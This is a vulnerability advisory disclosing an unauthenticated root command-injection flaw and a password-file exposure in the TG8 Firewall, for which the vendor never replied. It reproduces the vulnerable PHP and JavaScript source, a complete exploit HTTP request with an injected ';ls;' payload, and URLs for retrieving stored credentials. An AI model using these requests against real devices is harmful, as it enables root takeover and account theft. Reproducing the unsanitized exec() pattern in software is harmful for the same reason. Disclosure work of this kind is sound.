SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure

TL;DR

Find out how vulnerabilities in TG8 Firewall allows remote unauthenticated users to execute arbitrary code on the remote device as well as disclose the passwords of existing accounts.

Vulnerability Summary

Two security vulnerabilities in TG8 Firewall have been found allowing a remote user to execute commands as root user without needing to authenticate with the device or have any privileged access, the second vulnerability allows to expose existing users’ passwords without being authenticated with the remote device.

CVE

Pending

Credit

An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions
TG8 Firewall

Vendor Response

Numerous attempts to contact the vendor via Twitter, Facebook and Emails have not triggered any response from the vendor. We urge customers of this product to immediately block internet facing port 80/443 used for administering the device – it can be easily compromised.

Vulnerability Analysis

PreAuth RCE

The vulnerability exists in the way the authentication request is handled, due to which it leads to a remote command execution vulnerability with root user privileges. The data passed via user and password parameters is directly used as a parameter of a Linux command which allows command execution.

index.php source code

If you examine the index.php file you will notice that it calls a command called runphpcmd.php with a value of 'sudo /home/TG8/v3/syscmd/check_gui_login.sh ' + username + ' ' + pass; this is very strange and very unusual, but what you should immediately notice its basically calling a command prefixed with sudo and examines the response to that command.

Obviously if we change the cmd being called we can theoretically execute any command, but lets first verify what runphpcmd.php does – as it may be filtering or limiting what commands can be run:

...
  function checkLogin() {
    var username = $('input[name=u]').val();
    var pass = $('input[name=p]').val();

    var cmd = 'sudo /home/TG8/v3/syscmd/check_gui_login.sh ' + username + ' ' + pass;
    $.ajax({
      url: "runphpcmd.php",
      type: "post",
      dataType: "json",
      cache: "false",
      data: {
        syscmd: cmd
      },
      success: function (x) {
        if (x == 'OK') {
          ok(username);
        } else {
          failed();
        }
      },
      error: function () {
      ok(username);
        // alert("failure to excute the command");
      }
    })
  }
...

runphpcmd.php source code

As can be seen in the source code of runphpcmd.php we can note that there is no verification of what syscmd is running and the outcome is returned in JSON format back to the caller of this file:

<?php
  header('Content-Type: application/json');

  $response= array();
  $output= array();

  $cmd_1 = $_POST['syscmd'];
  $data = 'cmd= '.$cmd_1."\n";
  $fp = fopen('/opt/phpJS.log', 'a');
  fwrite($fp, $data);

  exec($cmd_1,$output,$ret);

  $data = ' output ='. json_encode($output)."\n*******************************************************\n";
  $fp = fopen('/opt/phpJS.log', 'a');
  fwrite($fp, $data);

  $response[] = array("result" => $output);

  // Encoding array in JSON format
  echo json_encode($output);
?>

Exploit

POST http://<server>/admin/runphpcmd.php HTTP/1.1
Host: Server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive


syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<command here>++local

The value passed via the parameter syscmd is not sanitized which leads to RCE

ex: ls Command executed in below request. Payload: ;ls;

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bls%3B++local

The response for the above request will contain result for the command execution.

Password Disclosure

A folder that is insecurely accessible to remote unauthenticated users /data/ stores the credentials of previously logged on users. Since this folder doesn’t require any special access to access – enumerating the files that are located under it can be used to reveal accounts present on the TG8 Firewall.

Example URLs:

http://<server>/data/w-341.tg
http://<server>/data/w-342.tg
http://<server>/data/r-341.tg
http://<server>/data/r-342.tg

Interested in Remote Code Execution? You may be interested in these:

Looking to submit a Remote Code Execution vulnerability?

Talk to us!